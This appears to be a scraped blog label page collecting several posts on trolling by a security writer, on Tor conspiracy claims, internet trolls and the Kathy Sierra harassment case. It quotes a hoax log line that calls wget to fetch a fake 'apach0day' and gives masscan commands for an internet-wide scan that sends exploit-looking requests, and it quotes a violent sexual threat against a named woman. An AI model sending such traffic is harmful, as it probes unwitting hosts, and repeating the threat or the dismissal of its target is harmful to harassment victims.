Tor, also known as The Onion Router, bounces your traffic through several random Internet servers, thus hiding the source. It means you can surf a website without them knowing who you are. Your IP address may appear to be coming from Germany when in fact you live in San Francisco. When used correctly, it prevents eavesdropping by law enforcement, the NSA, and so on. It's used by people wanting to hide their actions from prying eyes, from political dissidents, to CIA operatives, to child pornographers.
Recently, Pando (an Internet infotainment site) released a story accusing Tor of being some sort of government conspiracy.
This is nonsense, of course. Pando's tell-all exposé of the conspiracy contains nothing that isn't already widely known. We in the community have long joked about this. We often pretend there is a conspiracy in order to annoy uptight Tor activists like Jacob Appelbaum, but we know there isn't any truth to it. This really annoys me -- how can I troll about Tor's government connections when Pando claims there's actually truth to the conspiracy?
The military and government throws research money around with reckless abandon. That no more means they created Tor than it means they created the Internet back in the 1970s. A lot of that research is pure research, intended to help people. Not everything the military funds is designed to kill people.
There is no single "government". We know, for example, that while some in government paid Jacob Appelbaum's salary, others investigated him for his Wikileaks connections. Different groups are often working at cross purposes -- even within a single department.
A lot of people have ties to the government, including working for the NSA. The NSA isn't some secret police designed to spy on Americans, so a lot of former NSA employees aren't people who want to bust privacy. Instead, most NSA employees are sincere in making the world a better place -- which includes preventing evil governments from spying on dissidents. As Snowden himself says, the NSA is full of honest people doing good work for good reasons. (That they've overstepped their bounds is a problem -- but that doesn't mean they are the devil).
Tor is based on open code and math. It really doesn't matter what conspiracy lies behind it, because we can see the code. It's like BitCoin -- we know there is a secret conspiracy behind it, with the secretive Satoshi Nakamoto owning a billion dollars worth of the coins. But that still doesn't shake our faith in the code and the math.
Dissidents use Tor -- successfully. We know that because the dissidents are still alive. Even if it's a secret conspiracy by the U.S. government, it still does what its supporters want, helping dissidents fight oppressive regimes. In any case, Edward Snowden, who had access to NSA secrets, trusts his own life to Tor.
Tor doesn't work by magic. I mention this because the Pando article lists lots of cases where Tor failed to protect people. The reasons were unlikely to have been flaws in Tor itself, but appear to have been other more natural causes. For example, the Silk Road server configuration proves it was open to the Internet as well as through Tor, a rookie mistake that revealed its location. The perfect concealment system can't work if you sometimes ignore it. It's like blaming the Pill for not preventing pregnancy because you took it only on some days but not others. Thus, for those of us who know technically how things work, none of the cases cited by Pando shake our trust in Tor.
I'm reasonably technical. I've read the Tor spec (though not the code). I play with things like hostile exit nodes. I fully know Tor's history and ties to the government. I find nothing in the Pando article that is credible, and much that is laughable. I suppose I'm guilty of getting trolled by this guy, but seriously, Pando pretends not to be a bunch of trolls, so maybe this deserves a response.
Showing posts with label troll. Show all posts
Showing posts with label troll. Show all posts
Thursday, November 27, 2014
Friday, August 15, 2014
Grow up, you babies
When I came home crying to my mommy because somebody at school called me "grahamcracker", my mother told me to just say "sticks and stones may break my bones but names will never hurt me". This frustrated me as a kid, because I wanted my mommy to make it stop, but of course, it's good advice. It was the only good advice back then, and it's the only solution now to stop Internet trolls.
In its quest to ban free speech, this NYTimes article can't even get the definition of the word "troll" right. Here's the correct definition:
That NYTimes article claims that trolling leads to incivility. The opposite is true. Incivility doesn't come from me calling you a jerk. Instead, incivility comes from your inability to ignore it. It's your emotional response that is the problem, and your desire to sic the police-state on me to make me stop.
Let's work together and make our society more civil, and get people to stop responding to trolls. Let's tell the whining babies to grow the fuck up, and just repeat "sticks and stones may break my bones but names will never hurt me".
In its quest to ban free speech, this NYTimes article can't even get the definition of the word "troll" right. Here's the correct definition:
"somebody who tries to provoke an emotional reaction"The way to stop trolls is to grow up and stop giving them that emotional reaction. That's going to be difficult, because we have a nation of whiners and babies who don't want to grow up, who instead want the nanny-state to stop mean people from saying mean things. This leads to a police-state, where the powerful exploit anti-trolling laws to crack down on free-speech.
That NYTimes article claims that trolling leads to incivility. The opposite is true. Incivility doesn't come from me calling you a jerk. Instead, incivility comes from your inability to ignore it. It's your emotional response that is the problem, and your desire to sic the police-state on me to make me stop.
Let's work together and make our society more civil, and get people to stop responding to trolls. Let's tell the whining babies to grow the fuck up, and just repeat "sticks and stones may break my bones but names will never hurt me".
Saturday, August 02, 2014
That Apache 0day was troll
Last week, many people saw what they thought was an Apache 0day. They say logs with lots of suggestive strings that looked like this:
[28/Jul/2014:20:04:07 +0000] “GET /?x0a/x04/x0a/x02/x06/x08/x09/cDDOSSdns-STAGE2;wget%20proxypipe.com/apach0day; HTTP/1.0″ 301 178 “-” “chroot-apach0day-HIDDEN BINDSHELL-ESTAB” “-”
Somebody has come forward and taken credit for this, admitting it was troll.
This is sort of a personality test. Many of us immediately assumed this was a troll, but that's because we are apt to disbelieve any hype. Others saw this as some new attack, but that's because they are apt to see attacks out of innocuous traffic. If your organization panicked at this "0day attack", which I'm sure some did, then you failed this personality test.
I don't know what tool the troll used, but I assume it was masscan, because that'd be the easiest way to do it. To do this with masscan, get a Debian/Ubuntu VPS and do the following:
apt-get install libpcap-dev dos2unix
git clone https://github.com/robertdavidgraham/masscan
cd masscan
make
echo "GET /my0dayexploit.php?a=\x0acat+/etc/password HTTP/1.0" >header.txt
echo "Referer: http://troll.com" >>header.txt
echo "" >>header.txt
unix2dos header.txt
iptables -A INPUT -p tcp --destination-port 4321 -j DROP
bin/masscan 0.0.0.0/0 -p80 --banners --hello-file header.txt --source-port 4321 --rate 1500000
Depending on the rate your VPS can transmit, you'll cover the entire Internet in one to ten hours.
The response output from servers will be printed to the screen. You probably don't want that, so you should add the "-oX troll.xml" to save the responses to an XML file.
The above example uses "echo" to append lines of text to a file since HTTP is conveniently a text-based protocol. Its uses "unix2dos" to convert the line-feeds into the cr-lf combination that HTTP wants.
Masscan has it's own TCP/IP stack. Thus, on Linux, it can't establish a TCP connection, because when it tries, the existing TCP stacks sees something wrong and sends a RST to kill the connection. One way to prevent this is to configure a firewall rule to tell the built-in Linux TCP/IP stack to ignore the port that masscan uses. Another way is to tell masscan to use a --source-ip that isn't assigned to any existing machine on the network.
The rates at which you can transmit vary widely by hosting provider. In theory, you should get a rate of 1.5-million packets/second, and that's easily obtained in a lab on slow machines. Yet, in real hosting environments, things slow down, and I haven't been able to figure out why. In my experience, 300,000 is more of what you'd expect to get.
Sunday, December 22, 2013
Trolling: what is it?
Over the holidays, one has to answer questions from one's family, like what is "bitcoin" or "twerking" or "trolling". In this post, I define the latter.
Trolling is like this tweet in response to a recent picture from the moon:
I am, of course, echoing the fringe who argue that the original moon landings were fake because there were no stars in the photographs.
I got a lot of responses calling me an idiot, but zero tweets with the correct explanation. The reason you can't see starts is exposure time: if you leave the shutter open long enough for stars to show up, then the foreground moonscape will be completely washed out. Presumably, if the Chinese had taken an iPhone into space with the HDR settings, which takes two photos with different exposure lengths, one might be able to get both a good bright foreground and dim background stars in the same photograph. But sadly, the Chinese didn't have iPhones to send to the moon.
The payoff to trolling is responses like this one that gets the reason completely wrong:
As I explained trolling, my mother asked me "Shouldn't you be worried that potential customers may see this, and not do business with you, thinking you are stupid?". Well, the short answer is no, because any customer who would is a customer I wouldn't want anyway.
But what my mother really asked is "aren't you afraid of looking stupid?". And the answer to that question should always be "no". Raise your hand in class and ask your question. Dance like nobody's watching. Stop caring so much what people think. Success and happiness only comes from being willing to look stupid. A good way to practice this by actually being stupid. You have to get used to the naysayers. Even at your most brilliant, when you are changing the world, there will always be someone claiming you are an idiot, and that everyone knows what you are doing is stupid and wrong.
And so that is trolling.
Trolling is like this tweet in response to a recent picture from the moon:
@SciencePorn Obviously fake. I see no stars in the background.
— Robert David Graham (@ErrataRob) December 20, 2013
I am, of course, echoing the fringe who argue that the original moon landings were fake because there were no stars in the photographs.
I got a lot of responses calling me an idiot, but zero tweets with the correct explanation. The reason you can't see starts is exposure time: if you leave the shutter open long enough for stars to show up, then the foreground moonscape will be completely washed out. Presumably, if the Chinese had taken an iPhone into space with the HDR settings, which takes two photos with different exposure lengths, one might be able to get both a good bright foreground and dim background stars in the same photograph. But sadly, the Chinese didn't have iPhones to send to the moon.
The payoff to trolling is responses like this one that gets the reason completely wrong:
@ErrataRob @SciencePorn hope you're being ironic. You can't see stars in the moon due to light reflected by the Earth
— Gabriel García (@yovivoenmordor) December 20, 2013
As I explained trolling, my mother asked me "Shouldn't you be worried that potential customers may see this, and not do business with you, thinking you are stupid?". Well, the short answer is no, because any customer who would is a customer I wouldn't want anyway.
But what my mother really asked is "aren't you afraid of looking stupid?". And the answer to that question should always be "no". Raise your hand in class and ask your question. Dance like nobody's watching. Stop caring so much what people think. Success and happiness only comes from being willing to look stupid. A good way to practice this by actually being stupid. You have to get used to the naysayers. Even at your most brilliant, when you are changing the world, there will always be someone claiming you are an idiot, and that everyone knows what you are doing is stupid and wrong.
And so that is trolling.
Saturday, March 31, 2007
Please stop feeding the trolls
When I was in grade school, I came home crying because another kid called me a bad name on the playground. My mom taught me that words can only hurt me if I let them. She taught me that the best response was to ignore the bullies.
What she taught me applies to the recent cyber-bullying against Java blogger Kathy Sierra. The crux of this story is that one or more people posted nasty and anonymous comments about her. The following is an example of one of those postings:
Such bullying is part of the larger problem of "forum trolls". Trolls are comments designed to provoke a reaction. They could be nasty personal comments, or political claims, or religious statements, or anything else that will provoke people to give the trollers attention. As my mommy taught to when dealing with bullies on the playground, the proper response to forum trolls is to ignore them. Getting upset over what they post is a choice you make. Responding to their posts only encourages them to post more of the same.
Unfortunately, many throughout the blogosphere have leapt to support Kathy. They have been competing amongst themselves to see who can be the most righteous in their outrage over the vileness of the trolls. The main effect of all these posts is, of course, to encourage forum trolls in general, and more bullying of Katy Sierra in particular.
The other effect is to encourage the government step in and do something. In much the same way that I wanted my mommy to fight the bullies for me, people today want the government to fight back against the forum trolls. This is a very bad thing. We already have the tools to deal with bullies. We can just ignore them. We can turn off anonymous posts from our forums. We can turn on keyword filters for offensive words. We can moderate posts, or use a community-moderation system like Slashdot. Lots of forums are essentially "troll-free" because anti-troll efforts work. Government intervention comes at a high cost removing our freedoms, such as speech and anonymity. People like Kathy Sierra should at least try to use the tools available to her before becoming a cry baby asking for the government to do something about it.
The bloggers who support Kathy have frequently made the point that the forum trolls are cowards hiding behind anonymity. I would suggest that it's the bloggers themselves who are cowards. It doesn't take much courage to post something everyone agrees with. The situation is like a lynch mob. Nobody likes the forum trolls, and therefore nobody is going to stand up for their rights. It doesn't take courage to go along with the mob and lynch them. It takes no courage to express your righteous anger against them. What would take courage is to oppose the mob and suggest that no matter how vile those posts were, that we still need to abide by solid principles, namely that we deal with immature trolls as mature adults, and that we don't discard our rights to free speech and Internet anonymity just because we don't like what they said. It's mob rule, for example, that is responsible for eroding our rights after 9/11 with the so-called "Patriot" Act, because no politician was brave enough to stand up to the mob.
Many have used this incident to promote the idea that the computer geek community is "misogynistic" (hates women). The opposite is true. Forum trolls don't use such language because it's what THEY think, but use it because it's what WE are offended by. Indeed, it's precisely the soft-misogynism of Kathy's supporters that's at fault here. They will leap to a woman's defense more readily than a man. Insults and threats are treated more seriously when a woman is involved. I can call a man a "dick" in nearly polite conversation, but the equivalent insult for a female is so offensive that I can say it here. The words are more insulting because we are treating women differently, not because the trollers are. While it is appropriate to escort a woman to a car at night (there is a physical disparity), it's inappropriate to act as if a woman is less capable of defending themselves on the Internet than a man.
See also: Penny Arcade
What she taught me applies to the recent cyber-bullying against Java blogger Kathy Sierra. The crux of this story is that one or more people posted nasty and anonymous comments about her. The following is an example of one of those postings:
fuck off you boring slut... i hope someone slits your throat and cums down your gobThis, and the other posts, were pretty nasty, but it really is a person's choice to pay attention to such words. Kathy has chosen to take the posts seriously. Indeed, she has become a bit delusional about them. She claimed that the comments were "threats", even though they don't quite meet the definition of the word . In her delusional paranoia, she has claimed that other well-respected bloggers were part of the conspiracy to threaten her (because nasty comments appeared not only on her blog, but on forums attached to other blogs as well). She implied that those other bloggers were responsible for the anonymous comments that appeared on their sites -- that they encouraged harassment of Kathy. She has sullied the name of well-respected bloggers who now struggle to defend their reputation.
Such bullying is part of the larger problem of "forum trolls". Trolls are comments designed to provoke a reaction. They could be nasty personal comments, or political claims, or religious statements, or anything else that will provoke people to give the trollers attention. As my mommy taught to when dealing with bullies on the playground, the proper response to forum trolls is to ignore them. Getting upset over what they post is a choice you make. Responding to their posts only encourages them to post more of the same.
Unfortunately, many throughout the blogosphere have leapt to support Kathy. They have been competing amongst themselves to see who can be the most righteous in their outrage over the vileness of the trolls. The main effect of all these posts is, of course, to encourage forum trolls in general, and more bullying of Katy Sierra in particular.
The other effect is to encourage the government step in and do something. In much the same way that I wanted my mommy to fight the bullies for me, people today want the government to fight back against the forum trolls. This is a very bad thing. We already have the tools to deal with bullies. We can just ignore them. We can turn off anonymous posts from our forums. We can turn on keyword filters for offensive words. We can moderate posts, or use a community-moderation system like Slashdot. Lots of forums are essentially "troll-free" because anti-troll efforts work. Government intervention comes at a high cost removing our freedoms, such as speech and anonymity. People like Kathy Sierra should at least try to use the tools available to her before becoming a cry baby asking for the government to do something about it.
The bloggers who support Kathy have frequently made the point that the forum trolls are cowards hiding behind anonymity. I would suggest that it's the bloggers themselves who are cowards. It doesn't take much courage to post something everyone agrees with. The situation is like a lynch mob. Nobody likes the forum trolls, and therefore nobody is going to stand up for their rights. It doesn't take courage to go along with the mob and lynch them. It takes no courage to express your righteous anger against them. What would take courage is to oppose the mob and suggest that no matter how vile those posts were, that we still need to abide by solid principles, namely that we deal with immature trolls as mature adults, and that we don't discard our rights to free speech and Internet anonymity just because we don't like what they said. It's mob rule, for example, that is responsible for eroding our rights after 9/11 with the so-called "Patriot" Act, because no politician was brave enough to stand up to the mob.
Many have used this incident to promote the idea that the computer geek community is "misogynistic" (hates women). The opposite is true. Forum trolls don't use such language because it's what THEY think, but use it because it's what WE are offended by. Indeed, it's precisely the soft-misogynism of Kathy's supporters that's at fault here. They will leap to a woman's defense more readily than a man. Insults and threats are treated more seriously when a woman is involved. I can call a man a "dick" in nearly polite conversation, but the equivalent insult for a female is so offensive that I can say it here. The words are more insulting because we are treating women differently, not because the trollers are. While it is appropriate to escort a woman to a car at night (there is a physical disparity), it's inappropriate to act as if a woman is less capable of defending themselves on the Internet than a man.
See also: Penny Arcade
Subscribe to:
Posts (Atom)